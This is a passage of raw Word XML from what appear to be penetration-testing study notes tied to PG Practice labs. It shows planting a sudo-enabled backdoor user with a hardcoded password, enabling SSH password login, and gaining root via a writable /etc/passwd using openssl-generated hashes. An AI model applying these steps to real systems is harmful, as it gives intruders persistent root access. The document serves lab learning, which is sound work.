          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> so that they can run "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo -i</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" and get a root shell. this is like adding a new user in windows and adding them to admin group</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E2B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="146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useradd -m -s /bin/bash michael</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E2C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1464"/>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-m</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> → make a home dir (/home/michael)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E2D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1464"/>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-s /bin/bash</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> → give it bash as default shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E2E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1464"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Verify that there is a michael directory in /home</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E2F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1464"/>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ls /home</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E30">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="146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echo 'michael:SuperSecret123!' | chpasswd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E31">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1464"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Give them sudo</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E32">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1464"/>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usermod -aG sudo michael</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1464"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">On distros without the sudo group, you might use wheel instead:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E34">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1464"/>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usermod -aG wheel michael</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E35">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1464"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Check that SSH daemon is running:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E36">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1464"/>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systemctl status ssh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E37">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1464"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Make sure </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/ssh/sshd_config</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> allows password login:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E38">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1464"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PermitRootLogin prohibit-password</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E39">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1464"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PasswordAuthentication yes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1464"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Restart sshd if you change the config:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E3B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="146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systemctl restart ssh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E3C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1464"/>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ssh michael@192.168.239.156</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E3D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1464"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">password is: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SuperSecret123!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E3E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1464"/>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sudo -i</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E3F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1464"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">and now you're root!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E40">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E41">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E42">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E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44">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E45">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_mjfg1isu64jx" w:id="411"/>
      <w:bookmarkEnd w:id="411"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to add root user if /etc/passwd is writable</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E46">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E47">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We also saw this in </w:t>
      </w:r>
      <w:hyperlink r:id="rId1018">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Snookums</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG Practice when we ran linPEAS and saw that /etc/passwd was writable</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E48">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E49">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We saw this in </w:t>
      </w:r>
      <w:hyperlink r:id="rId1019">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">EvilBox-One</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Play. The OSCP entry below also teaches us more in-depth, but here is a more TLDR Version:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E4A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E4B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">First, we need an </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">MD5-hashed password </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">in order to place it inside of /etc/passwd. There are other format that passwords can be found in /etc/passwd though. We can use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">OpenSSL, Perl, or Python</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. Here is all of them:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E4C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E4D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">OpenSSL:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E4E">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">openssl passwd -1 password2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E4F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1339"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">generates an MD5-hashed password of the word "password2" using the OpenSSL toolkit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E50">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1339"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"passwd" specifies that you want to create a hashed password</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E51">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1339"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"-l" specifies that you want MD5-hash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E52">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1339"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"password2" is the word that your want to be MD5-hashed</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E53">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1339"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you want to add salt, here is it:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1339"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">openssl passwd -1 -salt salt123 pass123</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E55">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1339"/>
        </w:numPr>
        <w:ind w:left="2880" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">salt123 is the password and pass123 is the password</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E56">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E57">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">openssl passwd -6 password@123</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E58">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="139"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"-6" means SHA‑512 crypt algorithm</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E59">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="139"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">That’s the format stored in</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> /etc/shadow</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> on modern Linux systems.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E5A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="139"/>
        </w:numPr>
